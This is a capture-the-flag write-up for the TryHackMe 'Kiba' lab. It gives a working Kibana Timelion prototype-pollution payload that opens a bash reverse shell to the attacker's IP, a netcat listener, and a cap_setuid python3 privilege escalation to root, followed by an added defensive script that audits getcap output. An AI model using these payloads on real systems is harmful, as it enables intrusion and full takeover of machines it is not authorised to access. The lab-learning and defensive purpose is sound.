Kiba — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my Kiba — TryHackMe — WriteUp. Check it out!
First, deploy the machine and scan it with nmap for open ports.
nmap -A -T4 -p- -v <ip>
A webserver is running at port 80, SSH at port 22 and Kibana at port 5601.
Open the Kibana web page and you’ll find the version under “Management”.
Searching on Google:
This post describes the Kibana vulnerability and also gives the CVE number needed for the answers.
Next, refer to this repo on GitHub:
Choose whichever exploit you like, but remember to change the IP address to your VPN IP and note the port.
For example:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/<your-VPN-ip>/1234 0>&1");process.exit()//') .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
Start a listener on your machine:
nc -lvnp 1234
Then do the above steps to open a reverse shell to your machine.
Now I’ve got the shell. Go around and get the 1st flag:
Now find a way to get root and obtain the final flag. First, find out what “Linux capabilities” are:
To list all files that have capabilities set, use getcap:
getcap -r / 2>/dev/null
** 2>/dev/null redirects all errors to /dev/null, so they won’t be printed.
As you can see, python3 in kiba’s home folder has the capability cap_setuid+ep. So let’s use this to get root.
**What is cap_setuid+ep?
Any binary with cap_setuid set can change its UID. The +ep suffix means the capability is in the file’s permitted (p) set and becomes effective (e) when the program starts. Note that root has UID 0, so if I can set the UID to 0, I will be root!
/home/kiba/.hackmeplease/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Now I’m root! Get the final flag:
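From the defender's side, the same getcap output can be triaged to catch a grant like this python3 one before it is abused. The script below is an added example, not part of the original write-up; the RISKY list, the HIGH/REVIEW rules, the function names and every sample line except the python3 finding are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: triage `getcap -r / 2>/dev/null` output for root-equivalent grants.
# RISKY and the HIGH/REVIEW rules are assumptions of this example, not a standard.
RISKY='cap_setuid|cap_setgid|cap_sys_admin|cap_dac_override|cap_sys_ptrace|cap_sys_module'

# audit_caps: reads getcap output on stdin, prints "SEVERITY<TAB>path<TAB>clause".
# Accepts both "path = cap_x+ep" (older libcap) and "path cap_x=ep" (newer libcap).
audit_caps() {
    awk -v risky="$RISKY" '
    {
        # Locate where the capability text starts; everything before it is the path.
        if (!match($0, / (= )?cap_[a-z_,]+[=+]/)) next
        path = substr($0, 1, RSTART - 1)
        caps = substr($0, RSTART + 1)
        sub(/^= /, "", caps)

        n = split(caps, clause, " ")
        for (i = 1; i <= n; i++) {
            # A clause is name[,name...] then = or + then flag letters (e, i, p).
            cut = match(clause[i], /[=+]/)
            if (!cut) continue
            names = substr(clause[i], 1, cut - 1)
            flags = substr(clause[i], cut + 1)
            # Inheritable-only grants do not give the file the capability on exec.
            if (flags !~ /p/) continue
            if (("," names ",") !~ (",(" risky "),")) continue

            sev = "REVIEW"
            base = path; sub(/.*\//, "", base)
            # Interpreters run arbitrary code, so the grant is as good as root.
            if (base ~ /^(python|perl|ruby|node|php|lua|bash|dash|sh)[0-9.]*$/) sev = "HIGH"
            # Capability-bearing files in user-writable trees are never expected.
            if (path ~ /^\/(home|tmp|var\/tmp|dev\/shm)\//) sev = "HIGH"
            printf "%s\t%s\t%s\n", sev, path, clause[i]
        }
    }'
}

# Constructed sample input (the python3 line mirrors the finding in this write-up).
sample_getcap_output() {
    cat <<'EOF'
/home/kiba/.hackmeplease/python3 = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/newuidmap cap_setuid=ep
/usr/bin/gnome-keyring-daemon cap_ipc_lock=ep
/opt/tool/helper cap_setuid+i
EOF
}

# On a real host, replace the sample with: getcap -r / 2>/dev/null | audit_caps
sample_getcap_output | audit_caps
```

A HIGH entry can be cleared with setcap -r <file> once it is confirmed that nothing legitimate depends on it.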
The end.
HAPPY HACKING